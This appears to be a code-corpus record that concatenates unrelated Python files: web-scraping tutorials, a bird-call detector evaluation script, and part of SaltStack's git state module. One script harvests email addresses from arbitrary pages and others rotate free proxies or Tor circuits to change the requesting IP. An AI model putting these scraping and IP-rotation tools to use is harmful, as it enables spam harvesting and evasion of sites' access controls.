for img in tqdm(soup.find_all("img"), "Extracting images"):
img_url = img.attrs.get("src") or img.attrs.get("data-src")
if not img_url:
# if img does not contain src attribute, just skip
continue
# make the URL absolute by joining domain with the URL that is just extracted
img_url = urljoin(url, img_url)
# remove URLs like '/hsts-pixel.gif?c=3.2.5'
try:
pos = img_url.index("?")
img_url = img_url[:pos]
except ValueError:
pass
# finally, if the url is valid
if is_valid(img_url):
urls.append(img_url)
return urls
def download(url, pathname):
"""
Downloads a file given an URL and puts it in the folder pathname
"""
# if path doesn't exist, make that path dir
if not os.path.isdir(pathname):
os.makedirs(pathname)
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = os.path.join(pathname, url.split("/")[-1])
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(1024), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
def main(url, path):
# get all images
imgs = get_all_images(url)
for img in imgs:
# for each img, download it
download(img, path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="This script downloads all images from a web page")
parser.add_argument("url", help="The URL of the web page you want to download images")
parser.add_argument("-p", "--path", help="The Directory you want to store your images, default is the domain of URL passed")
args = parser.parse_args()
url = args.url
path = args.path
if not path:
# if path isn't specified, use the domain name of that url as the folder name
path = urlparse(url).netloc
main(url, path)
import re
from requests_html import HTMLSession
import sys
url = sys.argv[1]
EMAIL_REGEX = r"""(?:[a-z0-9!#%&'*+/=?^_{|}-]+(?:\.[a-z0-9!#%&'*+/=?^_{|}-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"""
# initiate an HTTP session
session = HTMLSession()
# get the HTTP Response
r = session.get(url)
# for JAVA-Script driven websites
r.html.render()
with open(sys.argv[2], "a") as f:
for re_match in re.finditer(EMAIL_REGEX, r.html.raw_html.decode()):
print(re_match.group().strip(), file=f)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
# initialize an HTTP session
session = HTMLSession()
def get_all_forms(url):
"""Returns all form tags found on a web page's url """
# GET request
res = session.get(url)
# for javascript driven website
# res.html.render()
soup = BeautifulSoup(res.html.html, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""Returns the HTML details of a form,
including action, method and list of form controls (inputs, etc)"""
details = {}
# get the form action (requested URL)
action = form.attrs.get("action").lower()
# get the form method (POST, GET, DELETE, etc)
# if not specified, GET is the default in HTML
method = form.attrs.get("method", "get").lower()
# get all form inputs
inputs = []
for input_tag in form.find_all("input"):
# get type of input form control
input_type = input_tag.attrs.get("type", "text")
# get name attribute
input_name = input_tag.attrs.get("name")
# get the default value of that input tag
input_value =input_tag.attrs.get("value", "")
# add everything to that list
inputs.append({"type": input_type, "name": input_name, "value": input_value})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
if __name__ == "__main__":
import sys
# get URL from the command line
url = sys.argv[1]
# get all form tags
forms = get_all_forms(url)
# iteratte over forms
for i, form in enumerate(forms, start=1):
form_details = get_form_details(form)
print("="*50, f"form #{i}", "="*50)
pprint(form_details)
from bs4 import BeautifulSoup
from requests_html import HTMLSession
from pprint import pprint
from urllib.parse import urljoin
import webbrowser
import sys
from form_extractor import get_all_forms, get_form_details, session
# get the URL from the command line
url = sys.argv[1]
# get the first form (edit this as you wish)
first_form = get_all_forms(url)[0]
# extract all form details
form_details = get_form_details(first_form)
pprint(form_details)
# the data body we want to submit
data = {}
for input_tag in form_details["inputs"]:
if input_tag["type"] == "hidden":
# if it's hidden, use the default value
data[input_tag["name"]] = input_tag["value"]
elif input_tag["type"] != "submit":
# all others except submit, prompt the user to set it
value = input(f"Enter the value of the field '{input_tag['name']}' (type: {input_tag['type']}): ")
data[input_tag["name"]] = value
# join the url with the action (form request URL)
url = urljoin(url, form_details["action"])
if form_details["method"] == "post":
res = session.post(url, data=data)
elif form_details["method"] == "get":
res = session.get(url, params=data)
# the below code is only for replacing relative URLs to absolute ones
soup = BeautifulSoup(res.content, "html.parser")
for link in soup.find_all("link"):
try:
link.attrs["href"] = urljoin(url, link.attrs["href"])
except:
pass
for script in soup.find_all("script"):
try:
script.attrs["src"] = urljoin(url, script.attrs["src"])
except:
pass
for img in soup.find_all("img"):
try:
img.attrs["src"] = urljoin(url, img.attrs["src"])
except:
pass
for a in soup.find_all("a"):
try:
a.attrs["href"] = urljoin(url, a.attrs["href"])
except:
pass
# write the page content to a file
open("page.html", "w").write(str(soup))
# open the page on the default browser
webbrowser.open("page.html")
import requests
import pandas as pd
from bs4 import BeautifulSoup as bs
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,enq=0.5"
def get_soup(url):
"""Constructs and returns a soup using the HTML content of url passed"""
# initialize a session
session = requests.Session()
# set the User-Agent as a regular browser
session.headers['User-Agent'] = USER_AGENT
# request for english content (optional)
session.headers['Accept-Language'] = LANGUAGE
session.headers['Content-Language'] = LANGUAGE
# make the request
html = session.get(url)
# return the soup
return bs(html.content, "html.parser")
def get_all_tables(soup):
"""Extracts and returns all tables in a soup object"""
return soup.find_all("table")
def get_table_headers(table):
"""Given a table soup, returns all the headers"""
headers = []
for th in table.find("tr").find_all("th"):
headers.append(th.text.strip())
return headers
def get_table_rows(table):
"""Given a table, returns all its rows"""
rows = []
for tr in table.find_all("tr")[1:]:
cells = []
# grab all td tags in this table row
tds = tr.find_all("td")
if len(tds) == 0:
# if no td tags, search for th tags
# can be found especially in wikipedia tables below the table
ths = tr.find_all("th")
for th in ths:
cells.append(th.text.strip())
else:
# use regular td tags
for td in tds:
cells.append(td.text.strip())
rows.append(cells)
return rows
def save_as_csv(table_name, headers, rows):
pd.DataFrame(rows, columns=headers).to_csv(f"{table_name}.csv")
def main(url):
# get the soup
soup = get_soup(url)
# extract all the tables from the web page
tables = get_all_tables(soup)
print(f"[+] Found a total of {len(tables)} tables.")
# iterate over all tables
for i, table in enumerate(tables, start=1):
# get the table headers
headers = get_table_headers(table)
# get all the rows of the table
rows = get_table_rows(table)
# save table as csv file
table_name = f"table-{i}"
print(f"[+] Saving {table_name}")
save_as_csv(table_name, headers, rows)
if __name__ == "__main__":
import sys
try:
url = sys.argv[1]
except IndexError:
print("Please specify a URL.\nUsage: python html_table_extractor.py [URL]")
exit(1)
main(url)
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup
import colorama
# init the colorama module
colorama.init()
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
# initialize the set of links (unique links)
internal_urls = set()
external_urls = set()
total_urls_visited = 0
def is_valid(url):
"""
Checks whether url is a valid URL.
"""
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
"""
Returns all URLs that is found on url in which it belongs to the same website
"""
# all URLs of url
urls = set()
# domain name of the URL without the protocol
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
# href empty tag
continue
# join the URL if it's relative (not absolute link)
href = urljoin(url, href)
parsed_href = urlparse(href)
# remove URL GET parameters, URL fragments, etc.
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
# not a valid URL
continue
if href in internal_urls:
# already in the set
continue
if domain_name not in href:
# external link
if href not in external_urls:
print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
print(f"{GREEN}[*] Internal link: {href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=50):
"""
Crawls a web page and extracts all links.
You'll find all links in external_urls and internal_urls global set variables.
params:
max_urls (int): number of max urls to crawl, default is 30.
"""
global total_urls_visited
total_urls_visited += 1
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
parser.add_argument("url", help="The URL to extract links from.")
parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
args = parser.parse_args()
url = args.url
max_urls = args.max_urls
crawl(url, max_urls=max_urls)
print("[+] Total Internal links:", len(internal_urls))
print("[+] Total External links:", len(external_urls))
print("[+] Total URLs:", len(external_urls) + len(internal_urls))
domain_name = urlparse(url).netloc
# save the internal links to a file
with open(f"{domain_name}_internal_links.txt", "w") as f:
for internal_link in internal_urls:
print(internal_link.strip(), file=f)
# save the external links to a file
with open(f"{domain_name}_external_links.txt", "w") as f:
for external_link in external_urls:
print(external_link.strip(), file=f)
import requests
import random
from bs4 import BeautifulSoup as bs
def get_free_proxies():
url = "https://free-proxy-list.net/"
# get the HTTP response and construct soup object
soup = bs(requests.get(url).content, "html.parser")
proxies = []
for row in soup.find("table", attrs={"id": "proxylisttable"}).find_all("tr")[1:]:
tds = row.find_all("td")
try:
ip = tds[0].text.strip()
port = tds[1].text.strip()
host = f"{ip}:{port}"
proxies.append(host)
except IndexError:
continue
return proxies
def get_session(proxies):
# construct an HTTP session
session = requests.Session()
# choose one random proxy
proxy = random.choice(proxies)
session.proxies = {"http": proxy, "https": proxy}
return session
if __name__ == "__main__":
# proxies = get_free_proxies()
proxies = [
'167.172.248.53:3128',
'194.226.34.132:5555',
'203.202.245.62:80',
'141.0.70.211:8080',
'118.69.50.155:80',
'201.55.164.177:3128',
'51.15.166.107:3128',
'91.205.218.64:80',
'128.199.237.57:8080',
]
for i in range(5):
s = get_session(proxies)
try:
print("Request page with IP:", s.get("http://icanhazip.com", timeout=1.5).text.strip())
except Exception as e:
continue
import requests
from stem.control import Controller
from stem import Signal
def get_tor_session():
# initialize a requests Session
session = requests.Session()
# setting the proxy of both http & https to the localhost:9050
# (Tor service must be installed and started in your machine)
session.proxies = {"http": "socks5://localhost:9050", "https": "socks5://localhost:9050"}
return session
def renew_connection():
with Controller.from_port(port=9051) as c:
c.authenticate()
# send NEWNYM signal to establish a new clean connection through the Tor network
c.signal(Signal.NEWNYM)
if __name__ == "__main__":
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
renew_connection()
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
import requests
def get_tor_session():
# initialize a requests Session
session = requests.Session()
# this requires a running Tor service in your machine and listening on port 9050 (by default)
session.proxies = {"http": "socks5://localhost:9050", "https": "socks5://localhost:9050"}
return session
if __name__ == "__main__":
s = get_tor_session()
ip = s.get("http://icanhazip.com").text
print("IP:", ip)
import requests
url = "http://icanhazip.com"
proxy_host = "proxy.crawlera.com"
proxy_port = "8010"
proxy_auth = ":"
proxies = {
"https": f"https://{proxy_auth}{proxy_host}:{proxy_port}/",
"http": f"http://{proxy_auth}{proxy_host}:{proxy_port}/"
}
r = requests.get(url, proxies=proxies, verify=False)
from bs4 import BeautifulSoup as bs
import requests
USER_AGENT = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# US english
LANGUAGE = "en-US,enq=0.5"
def get_weather_data(url):
session = requests.Session()
session.headers['User-Agent'] = USER_AGENT
session.headers['Accept-Language'] = LANGUAGE
session.headers['Content-Language'] = LANGUAGE
html = session.get(url)
# create a new soup
soup = bs(html.text, "html.parser")
# store all results on this dictionary
result = {}
# extract region
result['region'] = soup.find("div", attrs={"id": "wob_loc"}).text
# extract temperature now
result['temp_now'] = soup.find("span", attrs={"id": "wob_tm"}).text
# get the day and hour now
result['dayhour'] = soup.find("div", attrs={"id": "wob_dts"}).text
# get the actual weather
result['weather_now'] = soup.find("span", attrs={"id": "wob_dc"}).text
# get the precipitation
result['precipitation'] = soup.find("span", attrs={"id": "wob_pp"}).text
# get the % of humidity
result['humidity'] = soup.find("span", attrs={"id": "wob_hm"}).text
# extract the wind
result['wind'] = soup.find("span", attrs={"id": "wob_ws"}).text
# get next few days' weather
next_days = []
days = soup.find("div", attrs={"id": "wob_dp"})
for day in days.findAll("div", attrs={"class": "wob_df"}):
# extract the name of the day
day_name = day.find("div", attrs={"class": "vk_lgy"}).attrs['aria-label']
# get weather status for that day
weather = day.find("img").attrs["alt"]
temp = day.findAll("span", {"class": "wob_t"})
# maximum temparature in Celsius, use temp[1].text if you want fahrenheit
max_temp = temp[0].text
# minimum temparature in Celsius, use temp[3].text if you want fahrenheit
min_temp = temp[2].text
next_days.append({"name": day_name, "weather": weather, "max_temp": max_temp, "min_temp": min_temp})
# append to result
result['next_days'] = next_days
return result
if __name__ == "__main__":
URL = "https://www.google.com/search?lr=lang_en&ie=UTF-8&q=weather"
import argparse
parser = argparse.ArgumentParser(description="Quick Script for Extracting Weather data using Google Weather")
parser.add_argument("region", nargs="?", help="""Region to get weather for, must be available region.
Default is your current location determined by your IP Address""", default="")
# parse arguments
args = parser.parse_args()
region = args.region
URL += region
# get data
data = get_weather_data(URL)
# print data
print("Weather for:", data["region"])
print("Now:", data["dayhour"])
print(f"Temperature now: {data['temp_now']}C")
print("Description:", data['weather_now'])
print("Precipitation:", data["precipitation"])
print("Humidity:", data["humidity"])
print("Wind:", data["wind"])
print("Next days:")
for dayweather in data["next_days"]:
print("="*40, dayweather["name"], "="*40)
print("Description:", dayweather["weather"])
print(f"Max temperature: {dayweather['max_temp']}C")
print(f"Min temperature: {dayweather['min_temp']}C")
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import sys
# URL of the web page you want to extract
url = sys.argv[1]
# initialize a session
session = requests.Session()
# set the User-agent as a regular browser
session.headers["User-Agent"] = "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
# get the HTML content
html = session.get(url).content
# parse HTML using beautiful soup
soup = bs(html, "html.parser")
# get the JavaScript files
script_files = []
for script in soup.find_all("script"):
if script.attrs.get("src"):
# if the tag has the attribute 'src'
script_url = urljoin(url, script.attrs.get("src"))
script_files.append(script_url)
# get the CSS files
css_files = []
for css in soup.find_all("link"):
if css.attrs.get("href"):
# if the link tag has the 'href' attribute
css_url = urljoin(url, css.attrs.get("href"))
css_files.append(css_url)
print("Total script files in the page:", len(script_files))
print("Total CSS files in the page:", len(css_files))
# write file links into files
with open("javascript_files.txt", "w") as f:
for js_file in script_files:
print(js_file, file=f)
with open("css_files.txt", "w") as f:
for css_file in css_files:
print(css_file, file=f)
import wikipedia
# print the summary of what python is
print(wikipedia.summary("Python Programming Language"))
# search for a term
result = wikipedia.search("Neural networks")
print("Result search of 'Neural networks':", result)
# get the page: Neural network
page = wikipedia.page(result[0])
# get the title of the page
title = page.title
# get the categories of the page
categories = page.categories
# get the whole wikipedia page text (content)
content = page.content
# get all the links in the page
links = page.links
# get the page references
references = page.references
# summary
summary = page.summary
# print info
print("Page content:\n", content, "\n")
print("Page title:", title, "\n")
print("Categories:", categories, "\n")
print("Links:", links, "\n")
print("References:", references, "\n")
print("Summary:", summary, "\n")
import requests
from bs4 import BeautifulSoup as bs
def get_video_info(url):
# download HTML code
content = requests.get(url)
# create beautiful soup object to parse HTML
soup = bs(content.content, "html.parser")
# initialize the result
result = {}
# video title
result['title'] = soup.find("span", attrs={"class": "watch-title"}).text.strip()
# video views (converted to integer)
result['views'] = int(soup.find("div", attrs={"class": "watch-view-count"}).text[:-6].replace(",", ""))
# video description
result['description'] = soup.find("p", attrs={"id": "eow-description"}).text
# date published
result['date_published'] = soup.find("strong", attrs={"class": "watch-time-text"}).text
# number of likes as integer
result['likes'] = int(soup.find("button", attrs={"title": "I like this"}).text.replace(",", ""))
# number of dislikes as integer
result['dislikes'] = int(soup.find("button", attrs={"title": "I dislike this"}).text.replace(",", ""))
# channel details
channel_tag = soup.find("div", attrs={"class": "yt-user-info"}).find("a")
# channel name
channel_name = channel_tag.text
# channel URL
channel_url = f"https://www.youtube.com{channel_tag['href']}"
# number of subscribers as str
channel_subscribers = soup.find("span", attrs={"class": "yt-subscriber-count"}).text.strip()
result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
return result
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
parser.add_argument("url", help="URL of the YouTube video")
args = parser.parse_args()
# parse the video URL from command line
url = args.url
data = get_video_info(url)
# print in nice format
print(f"Title: {data['title']}")
print(f"Views: {data['views']}")
print(f"\nDescription: {data['description']}\n")
print(data['date_published'])
print(f"Likes: {data['likes']}")
print(f"Dislikes: {data['dislikes']}")
print(f"\nChannel Name: {data['channel']['name']}")
print(f"Channel URL: {data['channel']['url']}")
print(f"Channel Subscribers: {data['channel']['subscribers']}")
| 33.686085
| 878
| 0.610527
|
4a022abc64e60bf6d1fb357a409978404426bade
| 10,921
|
py
|
Python
|
scripts/detector_eval/auto/evaluate_detectors.py
|
RichardLitt/Vesper
|
5360844f42a06942e7684121c650b08cf8616285
|
[
"MIT"
] | 29
|
2017-07-10T14:49:15.000Z
|
2022-02-02T23:14:38.000Z
|
scripts/detector_eval/auto/evaluate_detectors.py
|
Tubbz-alt/Vesper
|
76e5931ca0c7fbe070c53b1362ec246ec9007beb
|
[
"MIT"
] | 167
|
2015-03-17T14:45:22.000Z
|
2022-03-30T21:00:05.000Z
|
scripts/detector_eval/auto/evaluate_detectors.py
|
Tubbz-alt/Vesper
|
76e5931ca0c7fbe070c53b1362ec246ec9007beb
|
[
"MIT"
] | 4
|
2015-02-06T03:30:27.000Z
|
2020-12-27T08:38:52.000Z
|
"""
Plots precision-recall curves for detectors run on the BirdVox-full-night
recordings.
The inputs required by this script are:
1. CSV files produced by the run_detectors script. The directory containing
the files is specified by
scripts.pnf_energy_detector_eval.utils.WORKING_DIR_PATH. All CSV files in
the directory are processed.
2. The BirdVox-full-night CSV annotation files, as distributed with the
BirdVox-full-night dataset. The directory containing these files is
specified by scripts.pnf_energy_detector_eval.utils.ANNOTATIONS_DIR_PATH.
The outputs produced by this script are:
1. A PDF file for each input CSV file, containing plots of detector
precision-recall curves. The directory to which these files are written
is specified by scripts.pnf_energy_detector_eval.utils.WORKING_DIR_PATH.
"""
from collections import defaultdict
import csv
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.ticker import MultipleLocator
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scripts.detector_eval.auto.utils as utils
def window(offset, duration):
s2s = utils.seconds_to_samples
return (s2s(offset), s2s(duration))
DETECTOR_CALL_CENTER_WINDOWS = {
'MPG Ranch Thrush Detector 0.0': window(.150, .350),
'MPG Ranch Tseep Detector 0.0': window(.100, .200),
'Old Bird Thrush Detector Redux 1.1': window(.050, .200),
'Old Bird Tseep Detector Redux 1.1': window(.050, .200)
}
"""
Mapping from detector names to clip call center windows. For a
detected clip to be considered a call, its window must contain a
BirdVox-full-night call center.
"""
DETECTOR_REFERENCE_THRESHOLDS = {
'MPG Ranch Thrush Detector 0.0': .9,
'MPG Ranch Tseep Detector 0.0': .9,
'Old Bird Thrush Detector Redux 1.1': 1.3,
'Old Bird Tseep Detector Redux 1.1': 2
}
"""
Mapping from detector names to detector reference thresholds.
The plots produced by this script include dots at the reference thresholds.
"""
def main():
clip_file_paths = sorted(utils.WORKING_DIR_PATH.glob('*.csv'))
for path in clip_file_paths:
process_file(path)
utils.announce('Harold, your evaluation script has finished.')
def process_file(file_path):
detected_clips = get_detected_clips(file_path)
show_detected_clip_counts(detected_clips)
ground_truth_call_centers = get_ground_truth_call_centers()
show_ground_truth_call_counts(ground_truth_call_centers)
counts = count_detected_calls(detected_clips, ground_truth_call_centers)
unaggregated_df = create_unaggregated_df(counts)
aggregated_df = create_aggregated_df(unaggregated_df)
add_precision_recall_f1(unaggregated_df)
add_precision_recall_f1(aggregated_df)
print('unaggregated_df', unaggregated_df.to_csv())
print('aggregated_df', aggregated_df.to_csv())
file_name_base = file_path.name[:-len('.csv')]
plot_precision_recall_curves(
file_name_base, unaggregated_df, aggregated_df)
def get_detected_clips(file_path):
clips = defaultdict(list)
with open(file_path) as file_:
reader = csv.reader(file_)
# Skip header.
next(reader)
for row in reader:
key = (row[0], int(row[1]), float(row[2]))
value = (int(row[3]), int(row[4]))
clips[key].append(value)
return clips
def show_detected_clip_counts(clips):
print('Detected clip counts:')
keys = sorted(clips.keys())
for key in keys:
print(' ', key, len(clips[key]))
def get_ground_truth_call_centers():
centers = defaultdict(list)
for unit_num in utils.UNIT_NUMS:
file_path = utils.get_annotations_file_path(unit_num)
with open(file_path) as file_:
reader = csv.reader(file_)
# Skip header.
next(reader)
for row in reader:
time = float(row[0])
index = utils.seconds_to_samples(time)
freq = int(row[1])
call_type = get_call_type(freq)
key = (call_type, unit_num)
centers[key].append(index)
# Make sure center index lists are sorted.
for indices in centers.values():
indices.sort()
return centers
def get_call_type(freq):
return 'Tseep' if freq >= utils.FREQ_THRESHOLD else 'Thrush'
def show_ground_truth_call_counts(call_centers):
print('Ground truth call counts:')
keys = sorted(call_centers.keys())
for key in keys:
print(' ', key, len(call_centers[key]))
def count_detected_calls(detected_clips, ground_truth_call_center_indices):
rows = []
for (detector_name, unit_num, threshold), clips in detected_clips.items():
detector_type = get_detector_type(detector_name)
call_center_indices = \
ground_truth_call_center_indices[(detector_type, unit_num)]
window = get_detector_call_center_window(detector_name)
if window is None:
print((
'Could not find call center window for detector "{}". '
'Detector will not be evaluated.').format(detector_name))
continue
matches = match_clips_with_calls(clips, call_center_indices, window)
detected_call_count = len(matches)
detected_clip_count = len(clips)
ground_truth_call_count = len(call_center_indices)
rows.append([
detector_name, unit_num, threshold, ground_truth_call_count,
detected_call_count, detected_clip_count])
return rows
def get_detector_type(detector_name):
return 'Thrush' if detector_name.find('Thrush') != -1 else 'Tseep'
def get_detector_call_center_window(detector_name):
return DETECTOR_CALL_CENTER_WINDOWS[detector_name]
def match_clips_with_calls(clips, call_center_indices, window):
clip_windows = [get_clip_window(clip, window) for clip in clips]
clip_count = len(clips)
call_count = len(call_center_indices)
i = 0
j = 0
matches = []
while i != clip_count and j != call_count:
window_start_index, window_end_index = clip_windows[i]
call_center_index = call_center_indices[j]
if window_end_index <= call_center_index:
# clip window i precedes call center j
i += 1
elif window_start_index > call_center_index:
# clip window i follows call center j
j += 1
else:
# clip window i includes call center j
matches.append((i, j))
i += 1
j += 1
return matches
def get_clip_window(clip, window):
clip_start_index, clip_length = clip
clip_end_index = clip_start_index + clip_length
window_start_offset, window_length = window
window_start_index = min(
clip_start_index + window_start_offset, clip_end_index)
window_end_index = min(
window_start_index + window_length, clip_end_index)
return (window_start_index, window_end_index)
def create_unaggregated_df(rows):
columns = [
'Detector', 'Unit', 'Threshold', 'Ground Truth Calls',
'Detected Calls', 'Detected Clips']
return pd.DataFrame(rows, columns=columns)
def create_aggregated_df(df):
df = df.drop(columns=['Unit'])
grouped = df.groupby(['Detector', 'Threshold'], as_index=False)
return grouped.aggregate(np.sum)
def add_precision_recall_f1(df):
p = df['Detected Calls'] / df['Detected Clips']
r = df['Detected Calls'] / df['Ground Truth Calls']
df['Precision'] = to_percent(p)
df['Recall'] = to_percent(r)
df['F1'] = to_percent(2 * p * r / (p + r))
def to_percent(x):
return round(1000 * x) / 10
def plot_precision_recall_curves(
file_name_base, unaggregated_df, aggregated_df):
file_path = utils.get_plot_file_path(file_name_base)
with PdfPages(file_path) as pdf:
detector_names = unaggregated_df['Detector'].unique()
plot_precision_recall_curves_aux(
'All Units', aggregated_df, detector_names, pdf)
for unit_num in utils.UNIT_NUMS:
unit_name = 'Unit {}'.format(unit_num)
unit_df = unaggregated_df.loc[unaggregated_df['Unit'] == unit_num]
if unit_df.shape[0] != 0:
plot_precision_recall_curves_aux(
unit_name, unit_df, detector_names, pdf)
def plot_precision_recall_curves_aux(
title_suffix, full_df, detector_names, pdf):
plt.figure(figsize=(6, 6))
axes = plt.gca()
# Plot separate detector curves.
for i, detector_name in enumerate(detector_names):
df = full_df.loc[full_df['Detector'] == detector_name]
plot_precision_recall_curve(df, detector_name, i, axes)
# Set title and axis labels.
plt.title('Precision vs. Recall, ' + title_suffix)
plt.xlabel('Recall (%)')
plt.ylabel('Precision (%)')
# Set axis limits.
plt.xlim((0, 100))
plt.ylim((0, 100))
# Configure grid.
major_locator = MultipleLocator(25)
minor_locator = MultipleLocator(5)
axes.xaxis.set_major_locator(major_locator)
axes.xaxis.set_minor_locator(minor_locator)
axes.yaxis.set_major_locator(major_locator)
axes.yaxis.set_minor_locator(minor_locator)
plt.grid(which='both')
plt.grid(which='minor', alpha=.4)
# Show legend.
axes.legend()
pdf.savefig()
plt.close()
def plot_precision_recall_curve(df, detector_name, i, axes):
color = 'C{}'.format(i)
precisions = df['Precision'].values
recalls = df['Recall'].values
label = detector_name
axes.plot(recalls, precisions, color=color, label=label)
# Put marker at threshold nearest detector reference threshold.
reference_threshold = get_detector_reference_threshold(detector_name)
if reference_threshold is not None:
k = None
min_diff = 1e6
for j, t in enumerate(df['Threshold'].values):
diff = abs(t - reference_threshold)
if diff < min_diff:
k = j
min_diff = diff
axes.plot([recalls[k]], [precisions[k]], marker='o', color=color)
def get_detector_reference_threshold(detector_name):
return DETECTOR_REFERENCE_THRESHOLDS[detector_name]
if __name__ == '__main__':
main()
| 29.200535
| 78
| 0.64289
|
4a022c195e2a6c77cf636087eecd5ce3da91e1e5
| 114,741
|
py
|
Python
|
salt/states/git.py
|
feth/salt
|
f4e610bb987d9529faca1f0ad1c339d3c4b3642b
|
[
"Apache-2.0"
] | null | null | null |
salt/states/git.py
|
feth/salt
|
f4e610bb987d9529faca1f0ad1c339d3c4b3642b
|
[
"Apache-2.0"
] | 1
|
2019-09-06T13:57:28.000Z
|
2019-09-06T13:57:28.000Z
|
salt/states/git.py
|
feth/salt
|
f4e610bb987d9529faca1f0ad1c339d3c4b3642b
|
[
"Apache-2.0"
] | 1
|
2020-09-30T16:09:48.000Z
|
2020-09-30T16:09:48.000Z
|
# -*- coding: utf-8 -*-
'''
States to manage git repositories and git configuration
.. important::
Before using git over ssh, make sure your remote host fingerprint exists in
your ``~/.ssh/known_hosts`` file.
.. versionchanged:: 2015.8.8
This state module now requires git 1.6.5 (released 10 October 2009) or
newer.
'''
from __future__ import absolute_import
# Import python libs
import copy
import logging
import os
import re
import string
from distutils.version import LooseVersion as _LooseVersion
# Import salt libs
import salt.utils
import salt.utils.url
from salt.exceptions import CommandExecutionError
from salt.ext import six
log = logging.getLogger(__name__)
def __virtual__():
'''
Only load if git is available
'''
if 'git.version' not in __salt__:
return False
git_ver = _LooseVersion(__salt__['git.version'](versioninfo=False))
return git_ver >= _LooseVersion('1.6.5')
def _revs_equal(rev1, rev2, rev_type):
'''
Shorthand helper function for comparing SHA1s. If rev_type == 'sha1' then
the comparison will be done using str.startwith() to allow short SHA1s to
compare successfully.
NOTE: This means that rev2 must be the short rev.
'''
if (rev1 is None and rev2 is not None) \
or (rev2 is None and rev1 is not None):
return False
elif rev1 is rev2 is None:
return True
elif rev_type == 'sha1':
return rev1.startswith(rev2)
else:
return rev1 == rev2
def _short_sha(sha1):
return sha1[:7] if sha1 is not None else None
def _format_comments(comments):
'''
Return a joined list
'''
ret = '. '.join(comments)
if len(comments) > 1:
ret += '.'
return ret
def _need_branch_change(branch, local_branch):
'''
Short hand for telling when a new branch is needed
'''
return branch is not None and branch != local_branch
def _get_branch_opts(branch, local_branch, all_local_branches,
desired_upstream, git_ver=None):
'''
DRY helper to build list of opts for git.branch, for the purposes of
setting upstream tracking branch
'''
if branch is not None and branch not in all_local_branches:
# We won't be setting upstream because the act of checking out a new
# branch will set upstream for us
return None
if git_ver is None:
git_ver = _LooseVersion(__salt__['git.version'](versioninfo=False))
ret = []
if git_ver >= _LooseVersion('1.8.0'):
ret.extend(['--set-upstream-to', desired_upstream])
else:
ret.append('--set-upstream')
# --set-upstream does not assume the current branch, so we have to
# tell it which branch we'll be using
ret.append(local_branch if branch is None else branch)
ret.append(desired_upstream)
return ret
def _get_local_rev_and_branch(target, user, password):
'''
Return the local revision for before/after comparisons
'''
log.info('Checking local revision for {0}'.format(target))
try:
local_rev = __salt__['git.revision'](target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
log.info('No local revision for {0}'.format(target))
local_rev = None
log.info('Checking local branch for {0}'.format(target))
try:
local_branch = __salt__['git.current_branch'](target,
user=user,
password=password,
ignore_retcode=True)
except CommandExecutionError:
log.info('No local branch for {0}'.format(target))
local_branch = None
return local_rev, local_branch
def _strip_exc(exc):
'''
Strip the actual command that was run from exc.strerror to leave just the
error message
'''
return re.sub(r'^Command [\'"].+[\'"] failed: ', '', exc.strerror)
def _uptodate(ret, target, comments=None, local_changes=False):
ret['comment'] = 'Repository {0} is up-to-date'.format(target)
if local_changes:
ret['comment'] += ', but with local changes. Set \'force_reset\' to ' \
'True to purge local changes.'
